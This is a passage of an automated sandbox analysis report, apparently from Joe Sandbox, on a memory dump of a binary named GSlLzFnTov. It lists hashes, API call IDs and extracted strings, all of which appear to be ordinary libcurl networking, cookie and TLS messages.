                            • Opcode Fuzzy Hash: 70b3ba7b47507934b5f763d8a7dc68f7ba67d47251894a02df1358efe3a694ef
                            • Instruction Fuzzy Hash: 4802E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l$free
                            • String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
                            • API String ID: 1144208884-223163314
                            • Opcode ID: c89d5e06937abe97a4eee15252bc2f3268edd5fb744d9db88e930b3e6f67e44b
                            • Instruction ID: 22b93ef3530b49e21af5c75f5e32d3344ffe614707e0f45800567c67f33a42fb
                            • Opcode Fuzzy Hash: c89d5e06937abe97a4eee15252bc2f3268edd5fb744d9db88e930b3e6f67e44b
                            • Instruction Fuzzy Hash: C502E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast$__swprintf_lgetsockname$htonsstrtoul$bindlistenstrncpy
                            • String ID: %s %s$%s |%d|%s|%hu|$,%d,%d$EPRT$Failure sending EPRT command: %s$Failure sending PORT command: %s$PORT$bind() failed, we ran out of ports$bind(port=%hu) failed: %s$bind(port=%hu) on non-local address failed: %s$failed to resolve the address provided to PORT: %s$getsockname() failed: %s$socket failure: %s
                            • API String ID: 1221807063-3876000827
                            • Opcode ID: 6bb9cb6eaabdf09b76c790faaf4da649024a4b2638681c784dadd1df45279a0b
                            • Instruction ID: c0a374113fad95d4e773bebcd218ef31eb1808a1c6c3bfe7200d8bb3f1f45280
                            • Opcode Fuzzy Hash: 6bb9cb6eaabdf09b76c790faaf4da649024a4b2638681c784dadd1df45279a0b
                            • Instruction Fuzzy Hash: 9212C362A0C79281EB14BB25A4402BAB3B1FF45B88FC44135DA6E477C9DFBCE445C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,00000000,00000001,00000001,00000000,00001388,00000000,00007FF7F1DB590C), ref: 00007FF7F1DB4A42
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB4C16
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB4C3B
                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB5109
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB5268
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DB527B
                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00007FF7F1DADE4D), ref: 00007FF7F1DB580A
                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00007FF7F1DADE4D), ref: 00007FF7F1DB58A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: strncmp$strcmp$__acrt_iob_func_time64fclose
                            • String ID: #HttpOnly_$%4095[^;=] =%4095[^;]$%s cookie %s="%s" for domain %s, path %s, expire %I64d$Added$FALSE$Replaced$TRUE$WARNING: failed to open cookie file "%s"$__Host-$__Secure-$domain$expires$httponly$localhost$max-age$none$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                            • API String ID: 2920273863-749307724
                            • Opcode ID: 2a3735125d465d9038771dfe4a2ceceefc8435c8ef398494971df7135751f7b0
                            • Instruction ID: b52b3dd29e125a51f594dc47121e8eb80cc1c5ce4c6b56b839fdc311f30b30a0
                            • Opcode Fuzzy Hash: 2a3735125d465d9038771dfe4a2ceceefc8435c8ef398494971df7135751f7b0
                            • Instruction Fuzzy Hash: BF92BF21A0D786A1FF64EB2994402B9A7B0FF58B84F844035CA6F077D6DFBCE45487A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: htons$ErrorLastbindinet_ptonstrncmp$getsockname
                            • String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
                            • API String ID: 3536004664-1901189404
                            • Opcode ID: 92930e1a0554cb5abf70b28e1d484720b4bdbb8f2e83e3d6713fd1ba7309806d
                            • Instruction ID: b7682e08a3168dd00c737fba5c5da39deb6790977e4a7d03686abad7fd9f6348
                            • Opcode Fuzzy Hash: 92930e1a0554cb5abf70b28e1d484720b4bdbb8f2e83e3d6713fd1ba7309806d
                            • Instruction Fuzzy Hash: 43B1F362A1868291E714EB29E4406B9A770FF44B84FC0403AEE6F476D4DFFCE504C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CreateErrorEventLast
                            • String ID: Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                            • API String ID: 545576003-1941740749
                            • Opcode ID: a71da43479d1dcac11b2877f77ad2c18c13b94b794761e5cd4ccdb7b84bd3623
                            • Instruction ID: 2ad2ae83f0d2cc5ff0c6ec160fd544d0ed205cc30bcda4c74c8cb51e988aff37
                            • Opcode Fuzzy Hash: a71da43479d1dcac11b2877f77ad2c18c13b94b794761e5cd4ccdb7b84bd3623
                            • Instruction Fuzzy Hash: 6DC1B132B0964286EB55AB26A4103BDB3B1BF48B98F844435DD2E877D4DFBCE445C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CertCertificateContext$CryptErrorFreeLastObjectQueryStore
                            • String ID: -----END CERTIFICATE-----$-----BEGIN CERTIFICATE-----$schannel: CA file '%s' is not correctly formatted$schannel: added %d certificate(s) from CA file '%s'$schannel: did not add any certificates from CA file '%s'$schannel: failed to add certificate from CA file '%s' to certificate store: %s$schannel: failed to extract certificate from CA file '%s': %s$schannel: unexpected content type '%d' when extracting certificate from CA file '%s'
                            • API String ID: 854292303-665156428
                            • Opcode ID: 2ba88eb4ac4351e0ce57621135a28c58eaed0a47a29328f89bdaa95b271ba41b
                            • Instruction ID: ae41c2921806bcfa21fbc99abd72e13db24e9828b848645dad6adb658c6a30d3
                            • Opcode Fuzzy Hash: 2ba88eb4ac4351e0ce57621135a28c58eaed0a47a29328f89bdaa95b271ba41b
                            • Instruction Fuzzy Hash: D651C272B0865285EB18AB16E8102A9EBB4FB847C9FC08035DE5E077D5DFBCE145C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: %%25%s]$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
                            • API String ID: 0-1669851433
                            • Opcode ID: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
                            • Instruction ID: ab9eaf45061a4cab56b7447502bfedb97e0d52d22686184d00eadfed5b376dde
                            • Opcode Fuzzy Hash: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
                            • Instruction Fuzzy Hash: F312C522A0DB8685EB69EB15E450379A3B0EF04B84F944131DE6D437DADFBDE845C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _errno$strtol
                            • String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
                            • API String ID: 3596500743-988243589
                            • Opcode ID: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
                            • Instruction ID: 845787eb0d1d5d2df24d6f4c8a9b12e7efb7409f3950527a48417cf763e49a21
                            • Opcode Fuzzy Hash: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
                            • Instruction Fuzzy Hash: 30F1E573F08A124AFB24EF69D8001BCB7B1AB45369F904235DE3E577D5DBB8A9018790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1DA3968: GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA399D
                              • Part of subcall function 00007FF7F1DA3968: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA39AD
                            • CertGetNameStringA.CRYPT32 ref: 00007FF7F1DE93B9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: AddressCertHandleModuleNameProcString
                            • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                            • API String ID: 4138448956-2160583098
                            • Opcode ID: 2242bc0ed434ca2dc1ebd2ba583190439e4d238d5e87145ac37762e9d122868d
                            • Instruction ID: 04082857d81ee4424aa756113deb4263700c43424cd610d79e34b335e1d8315c
                            • Opcode Fuzzy Hash: 2242bc0ed434ca2dc1ebd2ba583190439e4d238d5e87145ac37762e9d122868d
                            • Instruction Fuzzy Hash: 4451BE26A0974281EB1CAF01A4602ADB770BB84B99FD48131DE6E037D8DFBCE445C391
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                            • API String ID: 1488884202-2102732564
                            • Opcode ID: b84edea642b1bcae355f1b7feebe49c5b6dde67c4707f370d7fcafed3e67bde2
                            • Instruction ID: df0ff1cbea08a845baddc076b13de932dc694ef3a8c02fee601b1a78cbc2d06c
                            • Opcode Fuzzy Hash: b84edea642b1bcae355f1b7feebe49c5b6dde67c4707f370d7fcafed3e67bde2
                            • Instruction Fuzzy Hash: ED214A52E09A4B52FF14E799A410BF882305B847C0FC44532E83E06BD7DFEDB68682E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: ALL$FLUSH$RELOAD$SESS$Set-Cookie:$ignoring failed cookie_init for %s
                            • API String ID: 0-3179978524
                            • Opcode ID: a57bdd88991d34b424dd8bc290a644bb890760003a0c993fa800d3274b4d58e6
                            • Instruction ID: 02ffe4bdd0a0f56e2e9d37d97cc702fbecb5dfe91894c4d720eac0fdff13d363
                            • Opcode Fuzzy Hash: a57bdd88991d34b424dd8bc290a644bb890760003a0c993fa800d3274b4d58e6
                            • Instruction Fuzzy Hash: ED23C632A0D642A5E769EE2CA04437EA6F4FB04748FA84135C66F467D5CFBDB542C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintfstrtoul
                            • String ID: %s://%s$Protocol "%s" not supported or disabled in libcurl$Switched from HTTP to HTTPS due to HSTS => %s$file$http$https
                            • API String ID: 1031268025-4054226901
                            • Opcode ID: 16191fe47cb0b803dfca3e1fdf1ef362561513f19bb76281d435c4603169ac62
                            • Instruction ID: 288f37caa26e9c5ad4aa6e9bb17bef0e4e1cacc8654d82585d80af9a7338e29e
                            • Opcode Fuzzy Hash: 16191fe47cb0b803dfca3e1fdf1ef362561513f19bb76281d435c4603169ac62
                            • Instruction Fuzzy Hash: 66F1A432A0878295EB14EB26D4506F9A7B1EF55B88F844436CE2E4B7D5DFBCE501C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                            • String ID: @
                            • API String ID: 3606780921-2766056989
                            • Opcode ID: eef22464055f357fe991cc84f11a53eb23bc5e3b34a884466998c4ac4d9a1e0b
                            • Instruction ID: ee82f10c3f16185539f4719e3c5c1feb7f267907f6ab7c101044f7fcf1edd0e4
                            • Opcode Fuzzy Hash: eef22464055f357fe991cc84f11a53eb23bc5e3b34a884466998c4ac4d9a1e0b
                            • Instruction Fuzzy Hash: AA315E22B0465286F714DF61E8447BDAB71BB88B89F848835DE1D57E88CFBCD145C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: atoi
                            • String ID: Clear auth, redirects scheme from %s to %s$Clear auth, redirects to port from %u to %u$GET$HEAD$Issue another request to this URL: '%s'$Maximum (%ld) redirects followed$Switch from POST to GET$Switch to %s
                            • API String ID: 657269090-1748258277
                            • Opcode ID: ff120324ba9403fc776b31a34ac807d608e073747f27a45686f60ac2633eeed9
                            • Instruction ID: a5fd1ce7a8b44cff471450aa3cc3d5d8f5bd3b3aa20b4b99064c3ea6a926164f
                            • Opcode Fuzzy Hash: ff120324ba9403fc776b31a34ac807d608e073747f27a45686f60ac2633eeed9
                            • Instruction Fuzzy Hash: EFD1BF32A0868395E714FB2594506B9A7F1EF88B88F880835DD2D577E5CFB8E441C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: =$DIGEST-MD5 handshake failure (empty challenge message)$GSSAPI handshake failure (empty security message)$GSSAPI handshake failure (invalid security data)$GSSAPI handshake failure (invalid security layer)$NTLM handshake failure (empty type-2 message)$SSPI: couldn't get auth info$Unsupported SASL authentication mechanism$WDigest$schannel: InitializeSecurityContext failed: %s
                            • API String ID: 0-2043923688
                            • Opcode ID: 2717936f915b78dc6edcd5d1d51e7e95852a8ae789f8366be48666d97513c568
                            • Instruction ID: 29d92b43006c6eb8602c4185069f77f2311281d90898098a58fcf6d53c220393
                            • Opcode Fuzzy Hash: 2717936f915b78dc6edcd5d1d51e7e95852a8ae789f8366be48666d97513c568
                            • Instruction Fuzzy Hash: 22A26036A08B4686EB18EF65D4902ADB7B0FB48789F808135DE2E47794DFBCE414C791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID:
                            • String ID: Digest$SSPI: couldn't get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$schannel: InitializeSecurityContext failed: %s
                            • API String ID: 0-2436749399
                            • Opcode ID: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
                            • Instruction ID: 543f920a8c68a535baf57be71b4837258a887b1fb5b4de05dfd1bf945699933c
                            • Opcode Fuzzy Hash: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
                            • Instruction Fuzzy Hash: 49127136A09B4686EB14EF25D4402A9B7B0FB48B89F904435DE6E037A8DFBCE455C7D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                            • String ID:
                            • API String ID: 3140674995-0
                            • Opcode ID: 4f2c18be13e5319f265db4d8e366183014555f152333f998b8544a05bee3f441
                            • Instruction ID: 9e91eafcba6c1607a1632dc5bde32fae57dbad711b7ea2aba5274c0cf2beaba5
                            • Opcode Fuzzy Hash: 4f2c18be13e5319f265db4d8e366183014555f152333f998b8544a05bee3f441
                            • Instruction Fuzzy Hash: 5C314F72609A818AEB649F60E8403EDB374FB84745F84843ADA5D47BD8DFB8D648C760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
